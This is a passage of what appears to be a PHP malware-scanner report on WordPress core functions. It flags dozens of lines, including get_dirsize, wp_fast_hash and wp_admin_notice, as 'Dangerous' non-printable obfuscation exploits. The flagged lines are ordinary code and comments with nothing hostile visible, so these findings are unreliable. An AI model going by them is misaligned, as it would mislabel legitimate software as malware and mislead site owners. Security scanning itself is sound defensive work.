</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_dirsize</span><span style="color: #007700">( </span><span style="color: #0000BB">$directory</span><span style="color: #007700">, </span><span style="color: #0000BB">$max_execution_time </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8711</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">recurse_dirsize</span><span style="color: #007700">( </span><span style="color: #0000BB">$directory</span><span style="color: #007700">, </span><span style="color: #0000BB">$exclude </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$max_execution_time </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, &</span><span style="color: #0000BB">$directory_cache </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8721</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$directory_cache</span><span style="color: #007700">[ </span><span style="color: #0000BB">$directory </span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8737</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'ini_get' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the actual used space to short</span><span style="color: #007700">-</span><span style="color: #0000BB">circuit the recursive PHP file size calculation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8822</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clean_dirsize_cache</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">name</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">: </span><span style="color: #0000BB">A variable type</span><span style="color: #007700">, </span><span style="color: #0000BB">like </span><span style="color: #DD0000">"boolean" </span><span style="color: #007700">or </span><span style="color: #DD0000">"integer"</span><span style="color: #007700">. */</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 885</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">false Void on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">the post is not found</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8871</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the current WordPress version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8873</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an unmodified value of </span><span style="color: #007700">`</span><span style="color: #0000BB">$wp_version</span><span style="color: #007700">`. </span><span style="color: #0000BB">Some plugins modify the </span><span style="color: #007700">global</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8879</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The current WordPress version</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 887</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">do_enclose</span><span style="color: #007700">( </span><span style="color: #0000BB">$content</span><span style="color: #007700">, </span><span style="color: #0000BB">$post </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8881</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_wp_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8888</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$wp_version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8899</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">required version is compatible </span><span style="color: #007700">or empty, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8901</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_wp_version_compatible</span><span style="color: #007700">( </span><span style="color: #0000BB">$required </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8923</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return empty( </span><span style="color: #0000BB">$required </span><span style="color: #007700">) || </span><span style="color: #0000BB">version_compare</span><span style="color: #007700">( </span><span style="color: #0000BB">$version</span><span style="color: #007700">, </span><span style="color: #0000BB">$required</span><span style="color: #007700">, </span><span style="color: #DD0000">'>=' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8934</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_php_version_compatible</span><span style="color: #007700">( </span><span style="color: #0000BB">$required </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8935</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return empty( </span><span style="color: #0000BB">$required </span><span style="color: #007700">) || </span><span style="color: #0000BB">version_compare</span><span style="color: #007700">( </span><span style="color: #0000BB">PHP_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">$required</span><span style="color: #007700">, </span><span style="color: #DD0000">'>=' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8948</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the numbers match within the specified precision</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8950</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_fuzzy_number_match</span><span style="color: #007700">( </span><span style="color: #0000BB">$expected</span><span style="color: #007700">, </span><span style="color: #0000BB">$actual</span><span style="color: #007700">, </span><span style="color: #0000BB">$precision </span><span style="color: #007700">= </span><span style="color: #0000BB">1 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">abs</span><span style="color: #007700">( (float) </span><span style="color: #0000BB">$expected </span><span style="color: #007700">- (float) </span><span style="color: #0000BB">$actual </span><span style="color: #007700">) <= </span><span style="color: #0000BB">$precision</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns the markup </span><span style="color: #007700">for </span><span style="color: #0000BB">an admin notice</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8972</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The markup </span><span style="color: #007700">for </span><span style="color: #0000BB">an admin notice</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_admin_notice</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_admin_notice_markup'</span><span style="color: #007700">, </span><span style="color: #0000BB">$markup</span><span style="color: #007700">, </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_admin_notice</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the mime type is </span><span style="color: #007700">for </span><span style="color: #0000BB">a HEIC</span><span style="color: #007700">/</span><span style="color: #0000BB">HEIF image</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_is_heic_image_mime_type</span><span style="color: #007700">( </span><span style="color: #0000BB">$mime_type </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">( </span><span style="color: #0000BB">$mime_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$heic_mime_types</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a cryptographically secure hash of a message using a fast generic hash </span><span style="color: #007700">function.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to verify the hash</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">does not salt the value prior to being hashed</span><span style="color: #007700">, </span><span style="color: #0000BB">therefore input to this </span><span style="color: #007700">function </span><span style="color: #0000BB">must originate from</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is used internally</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">must not be used </span><span style="color: #007700">for </span><span style="color: #0000BB">hashing user</span><span style="color: #007700">-</span><span style="color: #0000BB">generated passwords</span><span style="color: #007700">. Use </span><span style="color: #0000BB">wp_hash_password</span><span style="color: #007700">() for </span><span style="color: #0000BB">that</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9130</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">must not be used </span><span style="color: #007700">for </span><span style="color: #0000BB">hashing other low</span><span style="color: #007700">-</span><span style="color: #0000BB">entropy input</span><span style="color: #007700">. Use </span><span style="color: #0000BB">wp_hash</span><span style="color: #007700">() for </span><span style="color: #0000BB">that</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The hash of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_fast_hash</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'$generic$' </span><span style="color: #007700">. </span><span style="color: #0000BB">sodium_bin2base64</span><span style="color: #007700">( </span><span style="color: #0000BB">$hashed</span><span style="color: #007700">, </span><span style="color: #0000BB">SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9152</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">uses Sodium to hash the message </span><span style="color: #007700">and </span><span style="color: #0000BB">compare it to the hashed value</span><span style="color: #007700">. If </span><span style="color: #0000BB">the hash is not a generic hash</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool Whether the message matches the hashed message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_verify_fast_hash</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( new </span><span style="color: #0000BB">PasswordHash</span><span style="color: #007700">( </span><span style="color: #0000BB">8</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">) )-></span><span style="color: #0000BB">CheckPassword</span><span style="color: #007700">( </span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$hash </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9175</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">( </span><span style="color: #0000BB">$hash</span><span style="color: #007700">, </span><span style="color: #0000BB">wp_fast_hash</span><span style="color: #007700">( </span><span style="color: #0000BB">$message </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serializes the </span><span style="color: #007700">array </span><span style="color: #0000BB">into a JSON string </span><span style="color: #007700">and </span><span style="color: #0000BB">generates a hash</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9190</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The generated unique ID </span><span style="color: #007700">for </span><span style="color: #0000BB">the </span><span style="color: #007700">array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_unique_id_from_values</span><span style="color: #007700">( array </span><span style="color: #0000BB">$data</span><span style="color: #007700">, </span><span style="color: #0000BB">string $prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">): </span><span style="color: #0000BB">string </span><span style="color: #007700">{</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$datetime</span><span style="color: #007700">-></span><span style="color: #0000BB">format</span><span style="color: #007700">( </span><span style="color: #0000BB">$type </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9206</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">. </span><span style="color: #0000BB">$hash</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 986</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return \</span><span style="color: #0000BB">WpOrg</span><span style="color: #007700">\</span><span style="color: #0000BB">Requests</span><span style="color: #007700">\</span><span style="color: #0000BB">Utility</span><span style="color: #007700">\</span><span style="color: #0000BB">CaseInsensitiveDictionary</span><span style="color: #007700">|</span><span style="color: #0000BB">false Headers on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_http_headers</span><span style="color: #007700">( </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$deprecated </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
